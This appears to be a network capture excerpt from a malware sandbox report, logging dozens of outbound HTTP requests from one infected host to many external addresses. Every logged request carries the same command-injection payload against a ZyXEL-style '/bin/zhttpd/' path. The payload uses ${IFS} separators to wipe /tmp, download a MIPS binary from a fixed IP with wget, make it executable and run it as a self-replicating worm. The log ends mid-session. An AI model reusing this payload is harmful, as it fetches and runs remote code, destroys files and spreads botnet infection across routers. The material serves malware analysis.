                                        Mar 31, 2024 09:20:43.388384104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1974192.168.2.2351304157.113.14.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388427973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1975192.168.2.2332980106.50.250.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388490915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1976192.168.2.233498285.35.236.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388525009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1977192.168.2.2335552103.193.44.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388572931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1978192.168.2.235421286.146.192.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388624907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1979192.168.2.233737042.136.68.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388679981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1980192.168.2.2334384213.68.197.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388726950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1981192.168.2.2342804110.141.24.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388756037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1982192.168.2.2354062211.55.151.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388788939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1983192.168.2.2350750200.63.140.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388834000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1984192.168.2.235813285.68.250.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388880014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1985192.168.2.2358232213.107.241.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388920069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1986192.168.2.2351746148.163.174.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389005899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1987192.168.2.235534658.51.237.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389038086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1988192.168.2.2339148106.147.123.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389081001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1989192.168.2.2349292144.150.78.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389106989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1990192.168.2.235490687.63.143.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389164925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1991192.168.2.2341540186.20.84.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389208078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1992192.168.2.23356582.247.86.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389273882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1993192.168.2.235852625.2.84.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389302969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1994192.168.2.233934463.196.89.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389349937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1995192.168.2.2354912156.165.128.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389389992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1996192.168.2.235210288.207.162.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389430046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1997192.168.2.2336040159.31.81.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389460087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1998192.168.2.2338214122.10.3.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389507055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1999192.168.2.2360992204.231.229.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389552116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2000192.168.2.2348770108.162.219.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389607906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2001192.168.2.233423879.158.41.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389663935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2002192.168.2.2352842219.109.166.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389720917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2003192.168.2.2351850104.144.117.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389771938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2004192.168.2.2360182166.78.49.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389827013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2005192.168.2.234547695.169.147.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389868975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2006192.168.2.235524632.63.50.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389920950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2007192.168.2.2341124206.91.138.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.389980078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2008192.168.2.2359338204.87.88.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390013933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2009192.168.2.2339856175.112.91.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390054941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2010192.168.2.234774454.4.251.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390100002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2011192.168.2.233898617.125.150.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390129089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2012192.168.2.2352776165.52.250.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390204906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2013192.168.2.2335672201.227.79.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390239954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2014192.168.2.234651086.147.2.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390286922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2015192.168.2.2343964129.57.239.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390342951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2016192.168.2.2340268104.238.28.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390391111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2017192.168.2.2334968151.254.106.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390425920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2018192.168.2.2345854204.146.145.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390471935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2019192.168.2.2348376157.189.182.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390523911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2020192.168.2.2355920109.49.107.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390583038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2021192.168.2.234362248.6.50.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390613079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2022192.168.2.2355660133.207.200.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390645027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2023192.168.2.234286073.50.84.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390695095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2024192.168.2.2358600199.121.242.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390743017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2025192.168.2.234645260.9.104.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390796900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2026192.168.2.2344230153.12.223.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390830994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2027192.168.2.2351272141.170.112.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390872002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2028192.168.2.2355108192.116.155.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390925884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2029192.168.2.2348494156.145.89.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390970945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2030192.168.2.233768458.211.115.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.390995979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2031192.168.2.233380647.90.198.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391052008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2032192.168.2.235421448.179.179.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391089916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2033192.168.2.235513668.173.175.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391141891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2034192.168.2.235675832.194.25.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391191006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2035192.168.2.234904637.205.190.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391220093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2036192.168.2.23393102.11.36.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391258955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2037192.168.2.233440853.23.137.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391311884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2038192.168.2.234562027.55.87.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391359091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2039192.168.2.2344806113.190.140.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391413927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2040192.168.2.234055292.143.238.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391462088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2041192.168.2.2349434118.40.209.109443
                                        TimestampBytes transferredDirectionData
